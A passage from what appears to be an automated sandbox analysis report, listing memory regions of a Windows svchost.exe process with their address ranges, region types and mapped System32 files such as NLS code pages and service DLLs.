= "private_0x00000000030e0000" filename = "" Region: id = 791 start_va = 0x3160000 end_va = 0x3170fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 792 start_va = 0x3190000 end_va = 0x328ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 793 start_va = 0x3290000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 794 start_va = 0x3310000 end_va = 0x3320fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 795 start_va = 0x3330000 end_va = 0x3340fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 796 start_va = 0x3350000 end_va = 0x3377fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 797 start_va = 0x3380000 end_va = 0x3380fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 798 start_va = 0x3390000 end_va = 0x3396fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 799 start_va = 0x33a0000 end_va = 0x33d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 800 start_va = 0x33e0000 end_va = 0x33f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 801 start_va = 0x3400000 end_va = 0x3410fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 802 start_va = 0x3420000 end_va = 0x3450fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 803 start_va = 0x3470000 end_va = 0x3476fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003470000" filename = "" Region: id = 804 start_va = 0x3480000 end_va = 0x34b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 805 start_va = 0x34c0000 end_va = 0x34d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 806 start_va = 0x3570000 end_va = 0x35effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 807 start_va = 0x35f0000 end_va = 0x36effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 808 start_va = 0x36f0000 end_va = 0x376ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 809 start_va = 0x3770000 end_va = 0x386ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 810 start_va = 0x3870000 end_va = 0x38effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 811 start_va = 0x3900000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 812 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 813 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 814 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 815 start_va = 0x3d00000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d00000" filename = "" Region: id = 816 start_va = 0x3e00000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 817 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 818 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 819 start_va = 0x4100000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 820 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 821 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 822 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 823 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 824 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 825 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 826 start_va = 0x4800000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 827 start_va = 0x4900000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 828 start_va = 0x4b00000 end_va = 0x4bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 829 start_va = 0x4c00000 end_va = 0x4cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 830 start_va = 0x4d00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 831 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 832 start_va = 0x5000000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 833 start_va = 0x5100000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 834 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 835 start_va = 0x5500000 end_va = 0x55fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 836 start_va = 0x5800000 end_va = 0x58fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 837 start_va = 0x5a00000 end_va = 0x5afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 838 start_va = 0x5b00000 end_va = 0x5bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b00000" filename = "" Region: id = 839 start_va = 0x5c00000 end_va = 0x5cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c00000" filename = "" Region: id = 840 start_va = 0x5d00000 end_va = 0x5dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d00000" filename = "" Region: id = 841 start_va = 0x5e00000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e00000" filename = "" Region: id = 842 start_va = 0x5f00000 end_va = 0x5ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 843 start_va = 0x6000000 end_va = 0x60fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006000000" filename = "" Region: id = 844 start_va = 0x6100000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 845 start_va = 0x6200000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 846 start_va = 0x6300000 end_va = 0x63fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 847 start_va = 0x6400000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 848 start_va = 0x6500000 end_va = 0x65fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 849 start_va = 0x6600000 end_va = 0x66fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006600000" filename = "" Region: id = 850 start_va = 0x6700000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006700000" filename = "" Region: id = 851 start_va = 0x6800000 end_va = 0x68fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 852 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 853 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 854 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 855 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 856 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 857 start_va = 0x6e00000 end_va = 0x6efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 858 start_va = 0x6f00000 end_va = 0x6ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f00000" filename = "" Region: id = 859 start_va = 0x7000000 end_va = 0x70fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007000000" filename = "" Region: id = 860 start_va = 0x7200000 end_va = 0x72fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007200000" filename = "" Region: id = 861 start_va = 0x7300000 end_va = 0x73fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007300000" filename = "" Region: id = 862 start_va = 0x7e00000 end_va = 0x7efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e00000" filename = "" Region: id = 863 start_va = 0x7f00000 end_va = 0x7ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f00000" filename = "" Region: id = 864 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 865 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 866 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 867 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 868 start_va = 0x7ff681250000 end_va = 0x7ff68125cfff monitored = 0 entry_point = 0x7ff681253980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 869 start_va = 0x7ff9fb5d0000 end_va = 0x7ff9fb5e7fff monitored = 0 entry_point = 0x7ff9fb5d1b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 870 start_va = 0x7ff9fc260000 end_va = 0x7ff9fc334fff monitored = 0 entry_point = 0x7ff9fc27cf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 871 start_va = 0x7ff9fc340000 end_va = 0x7ff9fc5effff monitored = 0 entry_point = 0x7ff9fc341cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 872 start_va = 0x7ff9fc5f0000 end_va = 0x7ff9fc601fff monitored = 0 entry_point = 0x7ff9fc5f1a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 873 start_va = 0x7ff9fc610000 end_va = 0x7ff9fc645fff monitored = 0 entry_point = 0x7ff9fc6127f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 874 start_va = 0x7ff9fc650000 end_va = 0x7ff9fc68efff monitored = 0 entry_point = 0x7ff9fc6782d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 875 start_va = 0x7ff9fde90000 end_va = 0x7ff9fdef6fff monitored = 0 entry_point = 0x7ff9fde9b160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 876 start_va = 0x7ff9fdfb0000 end_va = 0x7ff9fdfc3fff monitored = 0 entry_point = 0x7ff9fdfb2a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 877 start_va = 0x7ff9fe0a0000 end_va = 0x7ff9fe0e3fff monitored = 0 entry_point = 0x7ff9fe0c83e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 878 start_va = 0x7ff9fe0f0000 end_va = 0x7ff9fe111fff monitored = 0 entry_point = 0x7ff9fe102540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 879 start_va = 0x7ff9fe120000 end_va = 0x7ff9fe137fff monitored = 0 entry_point = 0x7ff9fe12b850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 880 start_va = 0x7ff9fe140000 end_va = 0x7ff9fe19cfff monitored = 0 entry_point = 0x7ff9fe16e510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 881 start_va = 0x7ff9ffc30000 end_va = 0x7ff9ffcaffff monitored = 0 entry_point = 0x7ff9ffc5d280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 882 start_va = 0x7ff9ffcb0000 end_va = 0x7ff9ffdbefff monitored = 0 entry_point = 0x7ff9ffcec010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 883 start_va = 0x7ffa00360000 end_va = 0x7ffa0047cfff monitored = 0 entry_point = 0x7ffa0038fe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 884 start_va = 0x7ffa01690000 end_va = 0x7ffa016a3fff monitored = 0 entry_point = 0x7ffa01693710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 885 start_va = 0x7ffa01740000 end_va = 0x7ffa0175dfff monitored = 0 entry_point = 0x7ffa0174ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 886 start_va = 0x7ffa06940000 end_va = 0x7ffa06956fff monitored = 0 entry_point = 0x7ffa06947520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 887 start_va = 0x7ffa069a0000 end_va = 0x7ffa069b5fff monitored = 0 entry_point = 0x7ffa069a1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 888 start_va = 0x7ffa07a20000 end_va = 0x7ffa07a30fff monitored = 0 entry_point = 0x7ffa07a27480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 889 start_va = 0x7ffa07a40000 end_va = 0x7ffa07ac3fff monitored = 0 entry_point = 0x7ffa07a58d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 890 start_va = 0x7ffa07ad0000 end_va = 0x7ffa07ae5fff monitored = 0 entry_point = 0x7ffa07ad55e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 891 start_va = 0x7ffa07af0000 end_va = 0x7ffa07bc5fff monitored = 0 entry_point = 0x7ffa07b1a800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 892 start_va = 0x7ffa07c20000 end_va = 0x7ffa07c83fff monitored = 0 entry_point = 0x7ffa07c3bed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 893 start_va = 0x7ffa07c90000 end_va = 0x7ffa07cb4fff monitored = 0 entry_point = 0x7ffa07c99900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 894 start_va = 0x7ffa07cc0000 end_va = 0x7ffa07cd3fff monitored = 0 entry_point = 0x7ffa07cc1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 895 start_va = 0x7ffa07ce0000 end_va = 0x7ffa07dd5fff monitored = 0 entry_point = 0x7ffa07d19590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 896 start_va = 0x7ffa07de0000 end_va = 0x7ffa07e53fff monitored = 0 entry_point = 0x7ffa07df5eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 897 start_va = 0x7ffa07e60000 end_va = 0x7ffa07f96fff monitored = 0 entry_point = 0x7ffa07ea0480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 898 start_va = 0x7ffa08390000 end_va = 0x7ffa083a0fff monitored = 0 entry_point = 0x7ffa08392fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 899 start_va = 0x7ffa083b0000 end_va = 0x7ffa083cdfff monitored = 0 entry_point = 0x7ffa083b3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 900 start_va = 0x7ffa083d0000 end_va = 0x7ffa08451fff monitored = 0 entry_point = 0x7ffa083d2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 901 start_va = 0x7ffa08460000 end_va = 0x7ffa08475fff monitored = 0 entry_point = 0x7ffa08461af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 902 start_va = 0x7ffa08480000 end_va = 0x7ffa08499fff monitored = 0 entry_point = 0x7ffa08482330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 903 start_va = 0x7ffa088d0000 end_va = 0x7ffa08915fff monitored = 0 entry_point = 0x7ffa088d79a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 904 start_va = 0x7ffa08940000 end_va = 0x7ffa0894efff monitored = 0 entry_point = 0x7ffa08944960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 905 start_va = 0x7ffa08a00000 end_va = 0x7ffa08a0bfff monitored = 0 entry_point = 0x7ffa08a035c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 906 start_va = 0x7ffa08a10000 end_va = 0x7ffa08a4ffff monitored = 0 entry_point = 0x7ffa08a1cbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 907 start_va = 0x7ffa08a50000 end_va = 0x7ffa08a96fff monitored = 0 entry_point = 0x7ffa08a51d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 908 start_va = 0x7ffa08ae0000 end_va = 0x7ffa08b21fff monitored = 0 entry_point = 0x7ffa08ae3670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 909 start_va = 0x7ffa08df0000 end_va = 0x7ffa08df7fff monitored = 0 entry_point = 0x7ffa08df13b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 910 start_va = 0x7ffa08e00000 end_va = 0x7ffa08e1efff monitored = 0 entry_point = 0x7ffa08e037e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 911 start_va = 0x7ffa08e20000 end_va = 0x7ffa08e98fff monitored = 0 entry_point = 0x7ffa08e276a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 912 start_va = 0x7ffa08eb0000 end_va = 0x7ffa08eeffff monitored = 0 entry_point = 0x7ffa08ec6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 913 start_va = 0x7ffa08f10000 end_va = 0x7ffa08f27fff monitored = 0 entry_point = 0x7ffa08f14e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 914 start_va = 0x7ffa08f30000 end_va = 0x7ffa08f54fff monitored = 0 entry_point = 0x7ffa08f35ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 915 start_va = 0x7ffa08f60000 end_va = 0x7ffa090e1fff monitored = 0 entry_point = 0x7ffa08f782a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 916 start_va = 0x7ffa090f0000 end_va = 0x7ffa09192fff monitored = 0 entry_point = 0x7ffa090f2c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 917 start_va = 0x7ffa091a0000 end_va = 0x7ffa091f1fff monitored = 0 entry_point = 0x7ffa091a5770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 918 start_va = 0x7ffa09200000 end_va = 0x7ffa0922dfff monitored = 1 entry_point = 0x7ffa09202300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 919 start_va = 0x7ffa09230000 end_va = 0x7ffa0928dfff monitored = 0 entry_point = 0x7ffa09235080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 920 start_va = 0x7ffa09290000 end_va = 0x7ffa092affff monitored = 0 entry_point = 0x7ffa09291f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 921 start_va = 0x7ffa092b0000 end_va = 0x7ffa092b8fff monitored = 0 entry_point = 0x7ffa092b18f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 922 start_va = 0x7ffa092c0000 end_va = 0x7ffa092d0fff monitored = 0 entry_point = 0x7ffa092c1d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 923 start_va = 0x7ffa09330000 end_va = 0x7ffa09347fff monitored = 0 entry_point = 0x7ffa09332000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 924 start_va = 0x7ffa09350000 end_va = 0x7ffa09390fff monitored = 0 entry_point = 0x7ffa09353750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 925 start_va = 0x7ffa09430000 end_va = 0x7ffa0947bfff monitored = 0 entry_point = 0x7ffa09445310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 926 start_va = 0x7ffa09490000 end_va = 0x7ffa0950efff monitored = 0 entry_point = 0x7ffa094a7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 927 start_va = 0x7ffa09510000 end_va = 0x7ffa0954bfff monitored = 0 entry_point = 0x7ffa09516aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 928 start_va = 0x7ffa09c80000 end_va = 0x7ffa09c88fff monitored = 0 entry_point = 0x7ffa09c821d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 929 start_va = 0x7ffa09c90000 end_va = 0x7ffa09cc4fff monitored = 0 entry_point = 0x7ffa09c9a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 930 start_va = 0x7ffa0a560000 end_va = 0x7ffa0a652fff monitored = 0 entry_point = 0x7ffa0a585d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 931 start_va = 0x7ffa0ac50000 end_va = 0x7ffa0ac59fff monitored = 0 entry_point = 0x7ffa0ac514c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 932 start_va = 0x7ffa0afc0000 